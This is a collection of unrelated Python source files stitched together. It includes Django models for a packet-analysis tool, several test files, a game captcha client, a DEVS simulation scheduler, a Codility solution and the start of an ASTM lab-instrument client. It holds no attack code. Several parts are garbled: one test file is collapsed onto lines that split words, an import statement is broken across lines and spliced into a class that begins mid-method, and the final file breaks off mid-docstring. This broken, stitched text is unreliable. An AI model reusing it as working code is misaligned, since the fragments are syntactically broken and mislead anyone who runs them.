# there should be also a table of fields that kepts the traffic bytes related with communication
class PacketDetails(models.Model):
    #datetime.datetime.fromtimestamp(float("1286715787.71")).strftime('%Y-%m-%d %H:%M:%S')
    ident = models.IntegerField()
    flow_hash = models.CharField(max_length=50)
    timestamp = models.DateTimeField()
    length = models.IntegerField()
    protocol = models.IntegerField()
    src_ip = models.IPAddressField()
    dst_ip = models.IPAddressField()
    sport = models.IntegerField()
    dport = models.IntegerField()
    data = models.TextField(null=True, blank=True)

    def __unicode__(self):
        return u'(%s, %s, %s, %s, %s)' % (self.protocol, self.src_ip, self.sport, self.dst_ip, self.dport)

    objects = MongoDBManager()


# save the ips at the applayerproto.log (http.log for ex)
class FlowDetails(models.Model):
    parent_hash_value = models.CharField(max_length=50)
    user_id = models.CharField(max_length=100)
    src_ip = models.IPAddressField()
    dst_ip = models.IPAddressField()
    sport = models.IntegerField()
    dport = models.IntegerField()
    protocol = models.CharField(max_length=10)
    timestamp = models.DateTimeField()

    objects = MongoDBManager()


class HTTPDetails(models.Model):
    # request or response
    http_type = models.CharField(max_length=10)
    # request fields
    method = models.CharField(max_length=5, null=True, blank=True)
    uri = models.URLField(null=True, blank=True)
    headers = models.TextField(null=True, blank=True)
    version = models.FloatField(null=True, blank=True)
    # request part ends
    # response fields
    # header and version is here also
    # BUGFIX: max_length was the *string* "5"; it must be an integer.
    reason = models.CharField(max_length=5, null=True, blank=True)
    status = models.IntegerField(null=True, blank=True)
    # i might need body
    body = models.TextField(null=True, blank=True)
    content_type = models.CharField(max_length=25, null=True, blank=True)
    content_encoding = models.CharField(max_length=25, null=True, blank=True)
    # response ends
    # i might need files also
    files = ListField(null=True, blank=True)
    file_path = models.CharField(max_length=200, null=True, blank=True)
    flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)
    #for raw_qeuries, filtering according to flow_details will be possible
    objects = MongoDBManager()


class DNSRequest(models.Model):
    type = models.IntegerField()
    human_readable_type = models.CharField(max_length=50)
    value = models.CharField(max_length=50, null=True, blank=True)
    flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)

    objects = MongoDBManager()


class DNSResponse(models.Model):
    type = models.IntegerField()
    human_readable_type = models.CharField(max_length=50)
    value = ListField(null=True, blank=True)
    flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)

    objects = MongoDBManager()


class SMTPDetails(models.Model):
    login_data = ListField(null=True, blank=True)
    msg_from = models.CharField(max_length=100, null=True, blank=True)
    rcpt_to = models.CharField(max_length=100, null=True, blank=True)
    raw = models.TextField(null=True, blank=True)
    msgdata = models.TextField(null=True, blank=True)
    attachment_path = ListField(null=True, blank=True)
    flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)

    objects = MongoDBManager()

    def get_path_dict(self):
        """Return [{'file_name': ..., 'path': ...}] for each attachment,
        with 'path' relative to the uploads root.

        #/home/oguz/git/ovizart/ovizart/uploads/16-06-12/a6a6defb7253043a55281d01aa66538a/smtp-messages/1/part-001.ksh
        """
        result = []
        for path in self.attachment_path:
            tmp = dict()
            # Everything after the literal "uploads" segment is the
            # user-visible relative path.
            r = path.split("uploads")
            file_name = os.path.basename(r[1])
            tmp['file_name'] = file_name
            tmp['path'] = r[1]
            result.append(tmp)
        return result
from django.urls import reverse
from oppia.test import OppiaTestCase

from reports.models import DashboardAccessLog


class ContextProcessorTest(OppiaTestCase):
    """Verify which page hits create DashboardAccessLog entries:
    logged-in dashboard requests do, anonymous and admin-site ones don't."""

    fixtures = ['tests/test_user.json',
                'tests/test_oppia.json',
                'tests/test_quiz.json',
                'tests/test_permissions.json',
                'tests/test_course_permissions.json',
                'tests/test_question_indices.json',
                'tests/awards/award-course.json',
                'tests/test_certificatetemplate.json']

    # home page not logged in
    def test_get_home_not_logged_in(self):
        dal_start_count = DashboardAccessLog.objects.all().count()
        self.client.get(reverse('oppia:index'))
        dal_end_count = DashboardAccessLog.objects.all().count()
        # shouldn't add a log for non logged in users
        self.assertEqual(dal_start_count, dal_end_count)

    # home page - all users - get
    def test_get_home_logged_in(self):
        # Each user role should add exactly one access-log row per GET.
        for user in (self.admin_user,
                     self.normal_user,
                     self.teacher_user,
                     self.staff_user):
            self.client.force_login(user=user)
            dal_start_count = DashboardAccessLog.objects.all().count()
            self.client.get(reverse('oppia:index'), follow=True)
            dal_end_count = DashboardAccessLog.objects.all().count()
            self.assertEqual(dal_start_count+1, dal_end_count)

    # home page - all users - post
    def test_post_home_logged_in(self):
        # POSTs are logged the same way as GETs for logged-in users.
        for user in (self.admin_user,
                     self.normal_user,
                     self.teacher_user,
                     self.staff_user):
            self.client.force_login(user=user)
            dal_start_count = DashboardAccessLog.objects.all().count()
            self.client.post(reverse('oppia:index'),
                             follow=True,
                             data={'test': 'mytest'})
            dal_end_count = DashboardAccessLog.objects.all().count()
            self.assertEqual(dal_start_count+1, dal_end_count)

    # admin pages get
    def test_get_admin(self):
        dal_start_count = DashboardAccessLog.objects.all().count()
        self.client.force_login(user=self.admin_user)
        self.client.get(reverse('admin:oppia_course_changelist'))
        dal_end_count = DashboardAccessLog.objects.all().count()
        # shouldn't add a log for admin
        self.assertEqual(dal_start_count, dal_end_count)

    # admin pages post
    # api pages
    # sensitive info
import os, requests, tempfile, time, webbrowser
import lacuna.bc
import lacuna.exceptions as err

### Dev notes:
### The tempfile containing the captcha image is not deleted until solveit()
### has been called.
###
### Allowing the tempfile to delete itself (delete=True during tempfile
### creation), or using the tempfile in conjunction with a 'with:' expression,
### have both been attempted.
###
### The problem is that, when using those auto-deletion methods, the tempfile
### is occasionally being removed from the system before the image viewer
### we're firing off actually gets a chance to read it.  Everything is
### happening in the right order, it's just that the image viewer startup is
### too slow.
###
### Deleting the tempfile manually in solveit() works - don't decide to get
### clever and replace the unlink() in solveit() with some form of tempfile
### autodeletion without a lot of testing.

class Captcha(lacuna.bc.LacunaObject):
    """ Fetches, displays, and solves graphical captchas.

    General usage will be::

        cap = my_client.get_captcha()
        cap.showit()            # display the captcha image
        cap.prompt_user()       # ask the user for a solution
        cap.solveit()           # check the user's solution
    """
    path = 'captcha'

    @lacuna.bc.LacunaObject.call_returning_meth
    def fetch( self, **kwargs ):
        """ Fetches a captcha for the user to solve from the server.

        This mirrors the TLE API, but you generally don't need to call this.

        Returns a :class:`lacuna.captcha.Puzzle` object.
        """
        return Puzzle( self.client, kwargs['rslt'] )

    def showit( self ):
        """ Actually downloads the captcha image, and attempts to display it
        to the user in one of several browsers.

        If :meth:`fetch` is called first, :meth:`showit` uses that fetched
        data, but this is not necessary.  :meth:`showit` will call fetch for
        you.

        Raises :class:`lacuna.exceptions.RequestError` if the image is not
        fetchable (network error or the TLE servers have gone down).

        Raises EnvironmentError if it cannot find an image viewer to use to
        display the captcha image.
        """
        # Lazily fetch puzzle metadata (url + guid) if the caller skipped fetch().
        if not hasattr(self,'url') or not hasattr(self,'guid'):
            puzzle      = self.fetch()
            self.url    = puzzle.url
            self.guid   = puzzle.guid

        img_resp = requests.get( self.url )
        if img_resp.status_code != 200:
            raise err.RequestError("The captcha image URL is not responding.")

        # delete=False on purpose — see the dev notes at the top of this file;
        # the file is removed manually in solveit().
        f = tempfile.NamedTemporaryFile( suffix='.png', prefix='tle_capcha_', delete=False );
        self.tempfile = f.name
        f.write( img_resp.content )

        if hasattr(img_resp, 'connection'):
            img_resp.connection.close()

        local_url = 'file://' + f.name
        # Try browsers from the generic default down to specific binaries;
        # the first one that webbrowser can locate wins.
        found_browser = False
        for b in [ None, 'windows-default', 'macosx', 'safari', 'firefox', 'google-chrome', 'chrome', 'chromium-browser', 'chromium' ]:
            try:
                browser = webbrowser.get( b )
                browser.open( local_url, 0, True )
                found_browser = True
                break
            except webbrowser.Error as e:
                pass
        if not found_browser:
            raise EnvironmentError("Unable to find a browser to show the captcha image.  Captcha solution is required.")

    def prompt_user(self):
        """ Prompts the user to solve the displayed captcha.

        It's not illegal to call this without first calling
        :meth:`solveit`, but doing so makes no sense.
        """
        self.resp = input("Enter the solution to the captcha here: ")
        return self.resp

    def solveit(self):
        """ Sends the user's response to the server to check for accuracy.

        Returns True if the user's response was correct.  Raises
        :class:`lacuna.exceptions.CaptchaResponseError` otherwise.
        """
        if not hasattr(self,'resp'):
            raise AttributeError("You must prompt the user for a response before calling solveit().")
        try:
            self.solve( self.guid, self.resp )
        except err.ServerError as e:
            raise err.CaptchaResponseError("Incorrect captcha response")
        finally:
            # One-shot object: clear the puzzle state and remove the temp
            # image whether or not the solution was accepted.
            delattr( self, 'url' )
            delattr( self, 'guid' )
            delattr( self, 'resp' )
            if os.path.isfile(self.tempfile):
                os.unlink( self.tempfile )
        return True

    @lacuna.bc.LacunaObject.call_member_meth
    def solve( self, guid:str, solution:str, **kwargs ):
        """ Mirrors the TLE Captcha module's :meth:`solve` method, but unless
        you really need this and you really know why, use :meth:`solveit`
        instead.
        """
        pass


class Puzzle(lacuna.bc.SubClass):
    """
    Object Attributes::

        url     FQ URL to the puzzle image
        guid    uuid attached to the puzzle; must be passed back along with
                the solution.
    """
from __future__ import unicode_literals import os.path from pre_commit.commands.clean import clean from pre_commit.util import rmtree def test_clean(runner_w
ith_mocked_store): assert os.path.exists(runner_with_mocked_store.store.directory) clean(runner_with_mocked_store) assert not os.pa
th.exists(runner_with_mocked_store.store.directory) def test_clean_empty(runner_with_mocked_store): """Make sure clean succeeds when we the directory doesn't exist.""" rmtree(runner_with_mocked_store.store.directory) assert not os.path.exists(runner_with_mocked_store.store.directory) clean(runner_with_mocked_store) assert not os.path.exists(runner_with_mocked_store.store.directory)
class Controller(object):
    """Abstract MVC controller: holds the model and dispatches UI events.

    Subclasses override the ``on_*`` handlers; every default implementation
    raises NotImplementedError so a missing override fails loudly.
    """

    def __init__(self, model):
        # The view is attached later through register_view(), so _view
        # may be None until then.
        self._model = model
        self._view = None

    def register_view(self, view):
        """Attach the view instance this controller drives."""
        self._view = view

    # --- application-level events -------------------------------------

    def on_quit(self, *args):
        raise NotImplementedError

    def on_keybinding_activated(self, core, time):
        raise NotImplementedError

    def on_show_about(self, sender):
        raise NotImplementedError

    def on_toggle_history(self, sender):
        raise NotImplementedError

    def on_show_preferences(self, sender):
        raise NotImplementedError

    # --- query-entry events -------------------------------------------

    def on_query_entry_changed(self, entry):
        raise NotImplementedError

    def on_query_entry_key_press_event(self, entry, event):
        raise NotImplementedError

    def on_query_entry_activate(self, entry):
        raise NotImplementedError

    # --- result treeview events ---------------------------------------

    def on_treeview_cursor_changed(self, treeview):
        raise NotImplementedError

    def on_match_selected(self, treeview, text, match_obj, event):
        raise NotImplementedError

    def on_do_default_action(self, treeview, text, match_obj, event):
        raise NotImplementedError

    def on_action_selected(self, treeview, text, action, event):
        raise NotImplementedError

    # --- history events -----------------------------------------------

    def on_clear_history(self, sender):
        raise NotImplementedError

    def on_history_match_selected(self, history, text, match):
        raise NotImplementedError
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>

from ggrc.converters import errors
from integration.ggrc import converters


class TestBasicCsvImport(converters.TestCase):
    """Import tests for custom-attribute deletion via CSV."""

    def setUp(self):
        # Authenticate before each test so the import endpoints respond.
        converters.TestCase.setUp(self)
        self.client.get("/login")

    def test_policy_basic_import(self):
        """Dry-run and real import of the deletion CSV must agree."""
        self.import_file("ca_setup_for_deletion.csv")
        response_data_dry = self.import_file("ca_deletion.csv", dry_run=True)
        response_data = self.import_file("ca_deletion.csv")
        self.assertEqual(response_data_dry, response_data)
        self.assertEqual(response_data[0]["deleted"], 2)
        self.assertEqual(response_data[0]["ignored"], 0)
import setuptools


def _read_lines(path):
    # Requirement files hold one entry per line.
    with open(path) as handle:
        return handle.read().splitlines()


with open("README.md", "r") as fh:
    long_description = fh.read()

requirements = _read_lines('requirements.txt')
cli_requirements = _read_lines('cli-requirements.txt')

setuptools.setup(
    name="uwg",
    use_scm_version=True,
    setup_requires=['setuptools_scm'],
    author="Ladybug Tools",
    author_email="info@ladybug.tools",
    description="Python application for modeling the urban heat island effect.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/ladybug-tools/uwg",
    packages=setuptools.find_packages(exclude=["tests*", "resources*"]),
    include_package_data=True,
    install_requires=requirements,
    extras_require={'cli': cli_requirements},
    entry_points={"console_scripts": ["uwg = uwg.cli:main"]},
    classifiers=[
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: Implementation :: CPython",
        "License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
        "Operating System :: OS Independent"
    ],
)
from collections import UserList

from gear import ffxiv, xivdb
from gear import power as p


class Gear(object):
    """A single piece of gear.

    slot       : gearset slot this gear occupies, as defined in ffxiv.slots
                 (None is tolerated for the aggregate GearSet pseudo-gear).
    item_id    : xivdb.com identifier; when given, the attributes are loaded
                 from xivdb and the keyword attributes are ignored.
    attributes : gear attributes as defined in ffxiv.attributes; anything
                 unknown is kept in ``self.misc``.
    """

    def __init__(self, slot, item_id=None, **attributes):
        if item_id is not None:
            attributes = xivdb.getId(item_id)
        # FIX: accept slot=None so GearSet (an aggregate pseudo-gear) can
        # reuse this constructor; the original assert rejected it.
        assert slot is None or slot in ffxiv.slots
        self.slot = slot
        # Keep only legitimate FFXIV attributes...
        self.attributes = {k: v for k, v in attributes.items()
                           if k in ffxiv.attributes}
        # ...and put everything else in misc.
        self.misc = {k: v for k, v in attributes.items()
                     if k not in ffxiv.attributes}


class GearSet(Gear):
    """A complete gear set; behaves as a Gear whose attributes are the sum
    of its parts.

    character_id : Lodestone id; when given, the gearset would be fetched
                   from Lodestone (not implemented yet).
    gears        : slot=Gear pairs, slots as defined in ffxiv.slots.
    """

    def __init__(self, character_id=None, **gears):
        self.gears = {}
        # If we do not fetch the gearset from Lodestone
        if character_id is None:
            for s in ffxiv.slots:
                g = gears.get(s)
                assert g is None or g.slot == s
                # BUG FIX: was ``self.gear[s] = g`` — attribute doesn't exist.
                self.gears[s] = g
        else:
            pass  # TODO add fetching gearset from Lodestone
        # A GearSet is treated as a Gear: aggregate each attribute over the
        # equipped pieces.
        attributes = {
            k: sum(g.attributes.get(k, 0)
                   for g in self.gears.values() if g is not None)
            for k in ffxiv.attributes}
        # BUG FIX: was ``super().__init__(None, *attributes)``, which unpacked
        # only the dict *keys* as positional arguments; keyword-unpack instead.
        super().__init__(None, **attributes)


class GearSetList(UserList):
    """List of GearSets to compare.

    data : an iterable of gearsets
    """

    def __init__(self, data=None):
        # BUG FIX: mutable default argument ``data=[]`` replaced by None
        # sentinel (the shared list would leak state between instances).
        super().__init__(data if data is not None else [])

    def maxPower(self, job, constraintList=None):
        """Return the best gearset for *job* given a list of constraints.

        Not implemented yet.
        """
        pass


def power(gear, job):
    """Weighted power of *gear* for *job*, using ffxiv.weights."""
    return sum(int(gear.attributes.get(k, 0)) * v
               for k, v in ffxiv.weights[job].items())
import sys
sys.path.insert(1, "../../../")
import h2o


def binop_plus(ip, port):
    """Exercise `+` across scalar / H2OVec / H2OFrame operand combinations.

    Loads a 65-row iris frame; asserts dimensions and column sums where an
    exact expectation is known, otherwise only show()s the result.
    Expected sums below are specific to iris_wheader_65_rows.csv.
    """
    # Connect to h2o
    h2o.init(ip, port)

    iris = h2o.import_frame(path=h2o.locate("smalldata/iris/iris_wheader_65_rows.csv"))
    rows, cols = iris.dim()
    iris.show()

    ###################################################################
    # LHS: scalar, RHS: H2OFrame
    res = 2 + iris
    res_rows, res_cols = res.dim()
    assert res_rows == rows and res_cols == cols, "dimension mismatch"
    for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]):
        assert abs(x - y) < 1e-1, "expected same values"

    # LHS: scalar, RHS: scalar
    res = 2 + iris[0]
    res2 = 1.1 + res[21,:]
    assert abs(res2 - 8.2) < 1e-1, "expected same values"

    ###################################################################
    # LHS: scalar, RHS: H2OFrame
    res = 1.2 + iris[2]
    res2 = res[21,:] + iris
    res2.show()

    # LHS: scalar, RHS: H2OVec
    res = 1.2 + iris[2]
    res2 = res[21,:] + iris[1]
    res2.show()

    # LHS: scalar, RHS: scalar
    res = 1.1 + iris[2]
    res2 = res[21,:] + res[10,:]
    assert abs(res2 - 5.2) < 1e-1, "expected same values"

    # LHS: scalar, RHS: scalar
    res = 2 + iris[0]
    res2 = res[21,:] + 3
    assert abs(res2 - 10.1) < 1e-1, "expected same values"

    ###################################################################
    # LHS: H2OVec, RHS: H2OFrame
    # NOTE(review): kept disabled — presumably awaiting dimension-mismatch
    # error support; confirm before re-enabling.
    #try:
    #    res = iris[2] + iris
    #    res.show()
    #    assert False, "expected error. objects with different dimensions not supported."
    #except EnvironmentError:
    #    pass

    # LHS: H2OVec, RHS: scalar
    res = 1.2 + iris[2]
    res2 = iris[1] + res[21,:]
    res2.show()

    ###################################################################
    # LHS: H2OFrame, RHS: H2OFrame
    res = iris + iris
    res_rows, res_cols = res.dim()
    assert res_rows == rows and res_cols == cols, "dimension mismatch"

    res = iris[0:2] + iris[1:3]
    res_rows, res_cols = res.dim()
    assert res_rows == rows and res_cols == 2, "dimension mismatch"

    #try:
    #    res = iris + iris[0:3]
    #    res.show()
    #    assert False, "expected error. frames are different dimensions."
    #except EnvironmentError:
    #    pass

    # LHS: H2OFrame, RHS: H2OVec
    #try:
    #    res = iris + iris[0]
    #    res.show()
    #    assert False, "expected error. objects of different dimensions not supported."
    #except EnvironmentError:
    #    pass

    # LHS: H2OFrame, RHS: scalar
    res = 1.2 + iris[2]
    res2 = iris + res[21,:]
    res2.show()

    # LHS: H2OFrame, RHS: scalar
    res = iris + 2
    res_rows, res_cols = res.dim()
    assert res_rows == rows and res_cols == cols, "dimension mismatch"
    for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]):
        assert abs(x - y) < 1e-1, "expected same values"

    ###################################################################


if __name__ == "__main__":
    h2o.run_test(sys.argv, binop_plus)
"""
https://codility.com/programmers/task/equi_leader/
"""
from collections import Counter, defaultdict


def solution(A):
    """Count the equi-leaders of A.

    Index i is an equi-leader when A[0..i] and A[i+1..] have the same
    leader (a value occurring in more than half of each part).
    Runs in O(n) time and O(n) space.
    """

    def _is_equi_leader(i):
        # `top` is the running mode of the prefix; a leader, if one exists,
        # must be the mode, so checking `top` alone is sufficient.
        prefix_count_top = running_counts[top]
        suffix_count_top = total_counts[top] - prefix_count_top
        return (prefix_count_top * 2 > i + 1) and \
               (suffix_count_top * 2 > len(A) - i - 1)

    total_counts = Counter(A)
    running_counts = defaultdict(int)
    top = A[0]
    result = 0
    # Stop one short of the end: the suffix must be non-empty.
    # FIX: ``xrange`` is Python-2-only; ``range`` behaves identically here
    # and keeps the function working on Python 3.
    for i in range(len(A) - 1):
        n = A[i]
        running_counts[n] += 1
        if running_counts[n] > running_counts[top]:
            top = n
        if _is_equi_leader(i):
            result += 1
    return result
# Copyright 2014 Modelling, Simulation and Design Lab (MSDL) at
# McGill University and the University of Antwerp (http://msdl.cs.mcgill.ca/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""
The No Age scheduler is based on the Heapset scheduler, though it does not
take age into account.

.. warning:: This scheduler does not take the age into account, making it
   **unusable** in simulations where the *timeAdvance* function can return
   (exactly) 0. If unsure, do **not** use this scheduler, but the more
   general Heapset scheduler.

The heap will contain only the timestamps of events that should happen. One
of the dictionaries will contain the actual models that transition at the
specified time. The second dictionary then contains a reverse relation: it
maps the models to their time_next. This reverse relation is necessary to
know the *old* time_next value of the model. Because as soon as the model
has its time_next changed, its previously scheduled time will be unknown.
This 'previous time' is **not** equal to the *timeLast*, as it might be
possible that the model's wait time was interrupted.

For a schedule, the model is added to the dictionary at the specified
time_next. In case it is the first element at this location in the
dictionary, we also add the timestamp to the heap. This way, the heap only
contains *unique* timestamps and thus the actual complexity is reduced to
the number of *different* timestamps. Furthermore, the reverse relation is
also updated.
Unscheduling is done similarly by simply removing the element from the
dictionary.

Rescheduling is a slight optimisation of unscheduling, followed by
scheduling.

This scheduler does still schedule models that are inactive (their
time_next is infinity), though this does not influence the complexity. The
complexity is not affected due to infinity being a single element in the
heap that is always present. Since a heap has O(log(n)) complexity, this
one additional element does not have a serious impact.

The main advantage over the Activity Heap is that it never gets dirty and
thus doesn't require periodic cleanup. The only part that gets dirty is the
actual heap, which only contains small tuples. Duplicates of these will
also be reduced to a single element, thus memory consumption should not be
a problem in most cases.

This scheduler is ideal in situations where most transitions happen at
exactly the same time, as we can then profit from the internal structure
and simply return the mapped elements. It results in sufficient efficiency
in most other cases, mainly due to the code base being a lot smaller than
the Activity Heap.
"""
from heapq import heappush, heappop
from pypdevs.logger import *


class SchedulerNA(object):
    """
    Scheduler class itself
    """
    def __init__(self, models, epsilon, total_models):
        """
        Constructor

        :param models: all models in the simulation
        :param epsilon: allowed deviation when comparing timestamps in
            getImminent (timestamps closer than epsilon count as equal)
        :param total_models: number of models; used to presize the
            model_id -> time_next reverse-lookup list
        """
        # Heap of scheduled timestamps (unique per timestamp; may go stale).
        self.heap = []
        # reverse[model_id] -> timestamp the model is currently scheduled at.
        self.reverse = [None] * total_models
        # mapped[timestamp] -> set of models transitioning at that timestamp.
        self.mapped = {}
        self.infinite = float('inf')
        # Init the basic 'inactive' entry here, to prevent scheduling in the heap itself
        self.mapped[self.infinite] = set()
        self.epsilon = epsilon
        for m in models:
            self.schedule(m)

    def schedule(self, model):
        """
        Schedule a model

        :param model: the model to schedule
        """
        try:
            self.mapped[model.time_next[0]].add(model)
        except KeyError:
            # First model at this timestamp: create its set and make the
            # timestamp known to the heap (pushed only once per timestamp).
            self.mapped[model.time_next[0]] = set([model])
            heappush(self.heap, model.time_next[0])
        try:
            self.reverse[model.model_id] = model.time_next[0]
        except IndexError:
            # model_id beyond the presized list: grow it by one entry.
            self.reverse.append(model.time_next[0])

    def unschedule(self, model):
        """
        Unschedule a model

        :param model: model to unschedule
        """
        try:
            self.mapped[self.reverse[model.model_id]].remove(model)
        except KeyError:
            # Not scheduled at that timestamp; nothing to remove.
            pass
        self.reverse[model.model_id] = None

    def massReschedule(self, reschedule_set):
        """
        Reschedule all models provided.
        Equivalent to calling unschedule(model); schedule(model) on every element in the iterable.

        :param reschedule_set: iterable containing all models to reschedule
        """
        #NOTE the usage of exceptions is a lot better for the PyPy JIT and nets a noticable speedup
        #     as the JIT generates guard statements for an 'if'
        for model in reschedule_set:
            model_id = model.model_id
            try:
                self.mapped[self.reverse[model_id]].remove(model)
            except KeyError:
                # Element simply not present, so don't need to unschedule it
                pass
            self.reverse[model_id] = tn = model.time_next[0]
            try:
                self.mapped[tn].add(model)
            except KeyError:
                # Create a tuple with a single entry and use it to initialize the mapped entry
                self.mapped[tn] = set((model, ))
                heappush(self.heap, tn)

    def readFirst(self):
        """
        Returns the time of the first model that has to transition

        :returns: timestamp of the first model
        """
        first = self.heap[0]
        # Lazily discard stale heap entries whose model set has been emptied
        # by unschedule/massReschedule.
        while len(self.mapped[first]) == 0:
            del self.mapped[first]
            heappop(self.heap)
            first = self.heap[0]
        # The age was stripped of
        return (first, 1)

    def getImminent(self, time):
        """
        Returns a list of all models that transition at the provided time, with the specified epsilon deviation allowed.

        :param time: timestamp to check for models

        .. warning:: For efficiency, this method only checks the **first** elements, so trying to invoke this function with a timestamp higher than the value provided with the *readFirst* method, will **always** return an empty set.
        """
        t, age = time
        imm_children = set()
        try:
            first = self.heap[0]
            if (abs(first - t) < self.epsilon):
                #NOTE this would change the original set, though this doesn't matter as it is no longer used
                imm_children = self.mapped.pop(first)
                heappop(self.heap)
                first = self.heap[0]
                # Keep draining while successive timestamps are within epsilon.
                while (abs(first - t) < self.epsilon):
                    imm_children |= self.mapped.pop(first)
                    heappop(self.heap)
                    first = self.heap[0]
        except IndexError:
            # Heap exhausted while draining; everything collected so far stands.
            pass
        return imm_children
# Grid Search for Algorithm Tuning
import numpy as np
import pandas as pd
from math import sqrt
from sklearn import datasets
from sklearn.linear_model import Ridge
from sklearn.grid_search import GridSearchCV

### Plotting function ###
from matplotlib import pyplot as plt
from sklearn.metrics import r2_score, mean_squared_error


def plot_r2(y, y_pred, title):
    """Scatter actual vs. predicted targets and annotate the R2 score."""
    plt.figure(figsize=(10, 6))
    plt.grid()
    plt.scatter(y, y_pred, marker='.')
    plt.xlabel("Actual Target"); plt.ylabel("Predicted Target")
    plt.title(title)
    xmn, xmx = plt.xlim()
    ymn, ymx = plt.ylim()
    mx = max(xmx, ymx)
    buff = mx * .1
    plt.text(xmn + buff, mx - buff, "R2 Score: %f" % (r2_score(y, y_pred), ), size=15)
    # Diagonal y == y_pred reference line.
    plt.plot([0., mx], [0., mx])
    plt.xlim(xmn, mx)
    plt.ylim(ymn, mx)


### Preprocessing ###
dataset = pd.read_csv("train.csv")
dataset.head()

feats = dataset.drop("revenue", axis=1)
X = feats.values  # features
y = dataset["revenue"].values  # target

# prepare a range of alpha values to test
alphas = np.array([1, 0.1, 0.01, 0.001, 0.0001, 0])  # 100000 works best.

# create and fit a ridge regression model, testing each alpha
model = Ridge()
grid = GridSearchCV(estimator=model, param_grid=dict(alpha=alphas))
# BUG FIX: fit() returns the fitted GridSearchCV object, not predictions;
# predict explicitly with the refit best estimator.
grid.fit(X, y)
y_pred = grid.predict(X)

# BUG FIX: r2_score result was silently discarded; report both metrics.
print(r2_score(y, y_pred))
# BUG FIX: sqrt and mean_squared_error were never imported (NameError),
# and ``print rmse`` was Python-2-only syntax.
rmse = sqrt(mean_squared_error(y, y_pred))
print(rmse)
fro
m .site import
Site
.mapping[self.state]) self.state = state def is_acceptable(self, state): if self.mapping is None: return True if state not in self.mapping: return False next_types = self.mapping[self.state] return '*' in next_types or state in next_types DEFAULT_RECORDS_FLOW_MAP = { None: ['H'], 'H': ['C', 'M', 'P', 'Q', 'L'], 'P': ['C', 'M', 'O', 'L'], 'Q': ['C', 'M', 'O', 'L'], 'O': ['C', 'M', 'P', 'O', 'R', 'L'], 'R': ['C', 'M', 'P', 'O', 'R', 'S', 'L'], 'S': ['C', 'M', 'P', 'O', 'R', 'S', 'L'], 'C': ['*'], 'M': ['*'], 'L': ['H'] } class Emitter(object): """ASTM records emitter for :class:`Client`. Used as wrapper for user provided one to provide proper routines around for sending Header and Terminator records. :param emitter: Generator/coroutine. :param encoding: Data encoding. :type encoding: str :param flow_map: Records flow map. Used by :class:`RecordsStateMachine`. :type: dict :param chunk_size: Chunk size in bytes. If :const:`None`, emitter record wouldn't be split into chunks. :type chunk_size: int :param bulk_mode: Sends all records for single session (starts from Header and ends with Terminator records) via single message instead of sending each record separately. If result message is too long, it may be split by chunks if `chunk_size` is not :const:`None`. Keep in mind, that collecting all records for single session may take some time and server may reject data by timeout reason. :type bulk_mode: bool """ #: Records state machine controls emitting records in right order. It #: receives `records_flow_map` as only argument on Emitter initialization. 
state_machine = RecordsStateMachine def __init__(self, emitter, flow_map, encoding, chunk_size=None, bulk_mode=False): self._emitter = emitter() self._is_active = False self.encoding = encoding self.records_sm = self.state_machine(flow_map) # flag to signal that user's emitter produces no records self.empty = False # last sent sequence number self.last_seq = 0 self.buffer = [] self.chunk_size = chunk_size self.bulk_mode = bulk_mode def _get_record(self, value=None): record = self._emitter.send(value if self._is_active else None) if not self._is_active: self._is_active = True if isinstance(record, Record): record = record.to_astm() try: self.records_sm(record[0]) except Exception as err: self.throw(type(err), err.args) return record def _send_record(self, record): if self.bulk_mode: records = [record] while True: record = self._get_record(True) records.append(record) if record[0] == 'L': break chunks = encode(records, self.encoding, self.chunk_size) else: self.last_seq += 1 chunks = encode([record], self.encoding, self.chunk_size, self.last_seq) self.buffer.extend(chunks) data = self.buffer.pop(0) self.last_seq += len(self.buffer) if record[0] == 'L': self.last_seq = 0 self.buffer.append(EOT) return data def send(self, value=None): """Passes `value` to the emitter. Semantically acts in same way as :meth:`send` for generators. If the emitter has any value within local `buffer` the returned value will be extracted from it unless `value` is :const:`False`. :param value: Callback value. :const:`True` indicates that previous record was successfully received and accepted by server, :const:`False` signs about his rejection. :type value: bool :return: Next record data to send to server. :rtype: bytes """ if self.buffer and value: return self.buffer.pop(0) record = self._get_record(value) return self._send_record(record) def throw(self, exc_type, exc_val=None, exc_tb=None): """Raises exception inside the emitter. Acts in same way as :meth:`throw` for generators. 
If the emitter had catch an exception and return any record value, it will be proceeded in common way. """ record = self._emitter.throw(exc_type, exc_val, exc_tb) if record is not None: return self._send_record(record) def close(self): """Closes the emitter. Acts in same way as :meth:`close` for generators. """ self._emitter.close() class Client(ASTMProtocol): """Common ASTM client implementation. :param emitter: Generator function that will produce ASTM records. :type emitter: function :param host: Server IP address or hostname. :type host: str :param port: Server port number. :type port: int :param timeout: Time to wait for response from server. If response wasn't received, the :meth:`on_timeout` will be called. If :const:`None` this timer will be disabled. :type timeout: int :param flow_map: Records flow map. Used by :class:`RecordsStateMachine`. :type: dict :param chunk_size: Chunk size in bytes. :const:`None` value prevents records chunking. :type chunk_size: int :param bulk_mode: Sends all records for single session (starts from Header and ends with Terminator records) via single message instead of sending each record separately. If result message is too long, it may be split by chunks if `chunk_size` is not :const:`None`. Keep in mind, that collecting all records for single session may take some time and server may reject data by timeout reason. :type bulk_mode: bool Base `emitter` is a generator that yield ASTM records one by one preserving their order:: from astm.records import ( HeaderRecord, PatientRecord, OrderRecord, TerminatorRecord ) def emitter(): assert (yield HeaderRecord()), 'header was rejected' ok = yield 